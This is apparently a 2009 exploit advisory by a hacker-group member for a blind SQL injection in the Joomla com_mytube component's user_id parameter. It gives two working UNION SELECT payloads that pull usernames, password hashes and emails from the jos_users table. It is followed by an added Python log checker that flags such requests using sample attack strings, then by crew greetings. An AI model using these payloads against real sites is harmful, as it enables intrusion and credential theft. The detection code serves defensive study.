Joomla component com_mytube (user_id) Blind SQLi Vulnerability
[!]========================================[!]
#Joomla Component com_mytube SQLi Vulnerability (id)
#Author : r3m1ck(r3m1ck@hackermail.com)
#Homepage: http://www.r3m1ck.uni.cc/
#Date : 6 December, 2009
[!]========================================[!]
[ Software Information ]
#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
[!]========================================[!]
[ Vulnerable File ]
http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=[U3D-Crew]&option=com_mytube&Itemid=r3m1ck
[ XpL ]
69+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck
69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,GROUP_CONCAT
(username,0x3a,password,0x3a,email,0x3c62723e),14,15,16,17,18,19,20,21,
22,23,24,25,26/**/FROM/**/jos_users--&option=com_mytube&Itemid=r3m1ck
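Added example (not part of the original advisory and not code from the component): a log check that flags requests to option=com_mytube whose user_id is not a plain integer, covering both the "+" and "/**/" whitespace variants shown above. The sample request lines and the function name classify are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request URIs (shortened; not taken from a real server log).
BASE = "/index.php?view=videos&type=member&user_id="
TAIL = "&option=com_mytube&Itemid=5"
SAMPLE_REQUESTS = [
    BASE + "69" + TAIL,
    BASE + "69+and+1=2+union+select+1,2+from+jos_users--" + TAIL,
    BASE + "69/**/AND/**/1=2/**/UNION/**/SELECT/**/1,2/**/FROM/**/jos_users--" + TAIL,
    "/index.php?option=com_content&view=article&id=12",
]

PLAIN_INT = re.compile(r"[0-9]+")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SQL_KEYWORDS = re.compile(r"\b(union|select|from|group_concat|and|or)\b", re.I)


def classify(request_uri):
    """Return (verdict, reasons) for one request URI.

    verdict is "ignore" (other component), "ok", or "alert".
    """
    # parse_qs URL-decodes values, so "+" and "%20" both become spaces.
    query = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    if query.get("option", [""])[0].lower() != "com_mytube":
        return "ignore", []
    reasons = []
    for value in query.get("user_id", []):  # a parameter may be repeated
        if PLAIN_INT.fullmatch(value):
            continue
        reasons.append("user_id is not a plain integer")
        if INLINE_COMMENT.search(value):
            reasons.append("inline /**/ comments used as whitespace")
        # Treat comments as spaces so both variants normalize to the same text.
        normalized = INLINE_COMMENT.sub(" ", value)
        hits = sorted({k.lower() for k in SQL_KEYWORDS.findall(normalized)})
        if hits:
            reasons.append("SQL keywords: " + ",".join(hits))
    return ("alert" if reasons else "ok"), reasons


if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        verdict, reasons = classify(uri)
        print(verdict, "|", "; ".join(reasons) or "-", "|", uri[:70])
```

The integer check alone is the reliable signal, since a legitimate user_id is numeric; the keyword and comment reasons only help triage the alert.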
[!]========================================[!]
[ Thx To ]
[+] U3D Crew | INDONESIAN CODER TEAM | Indonesian Hacker |
[+] otong,elisha,god~of~cats,bl4ck_f4d3,s1mb4h and all U3D Crew
[+] tukulesto,M3NW5,kaMtiEz,n4ck0,ibl13z,bobyhikaru,gonzhack
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-,L0l1ds,bumble_be
[ NOTE ]
[+] Why are the cyber forums in INDO fighting each other... let's unite.. united we stand, divided we fall!!
[+] Mom, dad, little sibling... sorry, r3m1ck can't earn his own money yet T_T
[+] IchaQcayang : let's keep up our efforts, dear, to reach our dreams !!! luv U
[ QUOTE ]
[+] U3D crew was here !!!!!
[+] nothing secure .. nothing is impossible